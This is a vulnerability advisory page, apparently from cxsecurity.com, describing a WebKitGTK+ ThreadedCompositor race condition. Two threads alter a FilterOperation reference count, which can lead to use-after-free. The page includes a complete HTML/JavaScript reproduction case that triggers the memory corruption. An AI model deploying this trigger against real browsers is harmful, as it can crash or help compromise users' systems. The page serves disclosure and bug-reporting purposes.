WebKitGTK+ ThreadedCompositor Race Condition

2019.04.10
Credit: Anonymouse
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-362

<!-- VULNERABILITY DETAILS The compositor thread in WebKitGTK+ might alter a FilterOperation object's reference count variable at the same time as the main thread. Then the reference count corruption might lead to a UAF condition. REPRODUCTION CASE --> <html> <style> @keyframes foo { 0% { opacity: 0; } 100% { opacity: 1; } } div { animation-name: foo; animation-duration: 1s; animation-iteration-count: infinite; filter: saturate(50%); } </style> <body> <script> frame = document.createElement("iframe"); setInterval(_ => { frame.remove(); document.body.appendChild(frame); doc = frame.contentDocument; doc.head.appendChild(document.querySelector("style").cloneNode(true)); elt = document.createElement("div"); elt.textContent = "foo"; let elements = []; for (let i = 0, count = Math.random() * 50; i < count; ++i) { elements[i] = doc.body.appendChild(elt.cloneNode(true)); elements[i].clientWidth; } }, Math.random() * 500); </script> </body> </html> <!-- VERSION Reproduced on WebKitGTK+ build revision 240647. This bug doesn't seem to affect WebKit on macOS/iOS. -->


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top